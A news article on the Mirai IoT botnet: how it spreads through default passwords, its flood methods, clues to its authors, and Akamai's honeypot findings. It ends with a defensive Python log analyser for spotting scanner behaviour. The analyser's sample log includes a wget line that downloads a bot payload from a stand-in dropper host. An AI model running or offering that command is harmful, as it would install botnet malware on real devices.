Now that its source code has been released you can expect more attacks from Mirai, the malware behind the largest DDoS attack on record, which was powered by hijacked IoT devices.

Since the release of that code last week it has been responsible for smaller attacks that look like newcomers experimenting with the malware in preparation for bigger things, say security researchers at Incapsula. “Likely, these are signs of things to come and we expect to deal with Mirai-powered attacks in the near future,” they say in their blog post.

That concern is echoed by researchers at F5, who say, “we can definitely expect the IoT DDoSing trend to rise massively in the global threat landscape.”

The historic attacks over the past two weeks that took down the popular KrebsOnSecurity site and challenged the resources of French hosting provider OVH mark the latest spikes in DDoS volume, which means mitigation infrastructure has to be prepared for attacks that are three to five times as large, according to Josh Shaul, vice president of web security for Akamai.

He says that despite the power of the attacks – up to 1Tbps – there’s nothing special about Mirai, which is named for the anime character Mirai Suenaga. “Usually the cool stuff is the exploits or the ability of the malware to hide or be persistent. Mirai can persist through a reboot of the infected device, but it’s not super sophisticated.”

It gets onto systems by being installed after attackers log in with default passwords. Mirai connects to an IRC-type service where it waits for commands. It doesn’t try to hide from forensic analysis, probably because the type of device it’s on won’t have an owner who is skilled enough to look for it. “It’s no Stuxnet,” he says.

The malware finds vulnerable machines by scanning a broad range of IP addresses until it finds IoT devices with easily guessable passwords, Incapsula says.
It’s got a number of DDoS attack methods in its playbook, including GRE, SYN, ACK, DNS, UDP and Simple Text Oriented Message Protocol (STOMP) floods.

The DNS attacks include the uncommon DNS Water Torture attack, which overloads the DNS servers used to resolve queries about the actual target, F5 says. When one server gets overloaded, the queries are retransmitted to another DNS server of the target, and so on, until legitimate traffic can’t be directed to the target.

Akamai’s Shaul says attackers are using smaller packets in their attacks, which stresses the networking equipment near the targeted servers as well as the servers themselves. Routers have to spend processing power on each packet regardless of its length, so boosting the sheer number of packets can cause network bottlenecks.

He says Akamai has observed this effect. “With less traffic but more packets, you can break the network gear in the middle,” he says. “We saw both sides of that equation in those attacks last week.”

Who’s behind it?

“One of the most interesting things revealed by the code was a hardcoded list of IPs Mirai bots are programmed to avoid when performing their IP scans,” Incapsula says. Those include the U.S. Department of Defense, the U.S. Post Office, HP, GE and the Internet Assigned Numbers Authority.

That leads the Incapsula researchers to speculate that the creators of the malware are naïvely trying to avoid attention by eliminating those IP ranges, then following up by using it to launch one of the most scrutinized attacks ever. “Together these paint a picture of a skilled, yet not particularly experienced, coder who might be a bit over his head,” they write, but not a veteran cyber criminal.

The code uses English for its command and control interface but also contains strings in Russian.
“This opens the door for speculation about the code’s origin, serving as a clue that Mirai was developed by Russian hackers or—at least—a group of hackers, some of whom were of Russian origin,” they write.

Whoever is behind Mirai might have launched the big attacks as a demonstration of its capabilities, so that the threat of a similar attack could be used to extort cash from potential victims in return for avoiding the DDoS attack, Shaul says.

Those who download the software might be people who have assembled a general-purpose botnet and want to weaponize it as a DDoS army that could be used, say, in a DDoS-for-hire business. “I’d be surprised if we don’t see that happen,” he says. “The person who’s got the skills to do botfarming may not have the skills to do DDoS.”

Individuals probably won’t download Mirai to carry out a spiteful DDoS attack because it’s much more efficient to hire a service, he says.

Recruiting IoT botnets has a lot of advantages over trying to compromise PCs and servers, experts say:

- Many IoT devices have publicly exposed administrative ports protected only by default passwords.
- The devices lack security software such as anti-virus.
- Residential customers and small businesses that lack security sophistication are in charge of protecting the devices.
- Typically IoT gear is connected to the internet all the time.
- Attackers don’t have to deal with social engineering, email poisoning or expensive zero-day attacks.

Akamai came across what came to be known as Mirai via a honeypot it set up last summer that drew attempts to log into the box. Most of the attempts came from China, Shaul says, and most were trying to log in as root.
Many of the passwords being tried against the honeypot were unique default passwords for IoT devices – closed-circuit cameras and DVRs.

Sometimes at login prompts the attacks would send shell commands, indicating that the malware had a bug that made it blind to the fact that its login attempt had failed, so it ran commands as if it had logged in successfully. The commands were attempts to download the Mirai malware.

That gave Akamai researchers something to compare actual attack traffic to. Akamai tracked down some of the hosts in the botnet and found they were closed-circuit cameras and DVR systems. So the packets being sent were similar to what Mirai sends, and the types of devices in the attacks were the types Mirai preys upon.
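As an added illustration (not from the article, Akamai, Incapsula or F5), the script below turns the honeypot observations above into detection logic: it parses constructed telnet-honeypot log lines in an assumed format and flags sources that hammer the login prompt with credentials or, like the buggy bot Akamai saw, send shell commands after a failed login.

```python
import re
from collections import defaultdict

# Constructed sample log (not real honeypot data); the line format is assumed:
#   <time> <source-ip> LOGIN user=<u> pass=<p> result=<OK|FAIL>
#   <time> <source-ip> CMD <shell command typed at the prompt>
SAMPLE_LOG = """\
10:00:01 203.0.113.5 LOGIN user=root pass=cred-a result=FAIL
10:00:02 203.0.113.5 LOGIN user=root pass=cred-b result=FAIL
10:00:03 203.0.113.5 LOGIN user=root pass=cred-c result=FAIL
10:00:03 203.0.113.5 CMD cd /tmp
10:00:04 203.0.113.5 CMD wget http://dropper.invalid/bot
10:00:10 198.51.100.9 LOGIN user=alice pass=secret result=OK
10:00:11 198.51.100.9 CMD ls
10:00:20 192.0.2.77 LOGIN user=root pass=cred-a result=FAIL
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (LOGIN|CMD) (.*)$")
LOGIN_RE = re.compile(r"user=(\S+) pass=\S+ result=(OK|FAIL)")

def parse(log_text):
    """Yield (time, ip, kind, detail) for each well-formed line."""
    for line in log_text.splitlines():
        if m := LINE_RE.match(line):
            yield m.groups()

def analyze(log_text, fail_threshold=3):
    """Return {ip: [reasons]} for sources behaving like a Mirai scanner."""
    per_ip = defaultdict(lambda: {"fails": 0, "root": 0, "blind": 0, "in": False})
    for _t, ip, kind, detail in parse(log_text):
        s = per_ip[ip]
        if kind == "LOGIN" and (m := LOGIN_RE.search(detail)):
            user, result = m.groups()
            s["root"] += user == "root"          # root is the account the bots go for
            s["fails"] += result == "FAIL"
            s["in"] = result == "OK"             # session state after this attempt
        elif kind == "CMD" and not s["in"]:
            s["blind"] += 1                      # command typed despite a failed login
    suspects = {}
    for ip, s in per_ip.items():
        reasons = []
        if s["fails"] >= fail_threshold:
            reasons.append(f"{s['fails']} failed logins, {s['root']} as root")
        if s["blind"]:
            reasons.append(f"{s['blind']} commands sent without a successful login")
        if reasons:
            suspects[ip] = reasons
    return suspects
```

With the sample log, only 203.0.113.5 is flagged at the default threshold; the single failed root attempt from 192.0.2.77 is flagged only if the threshold is lowered.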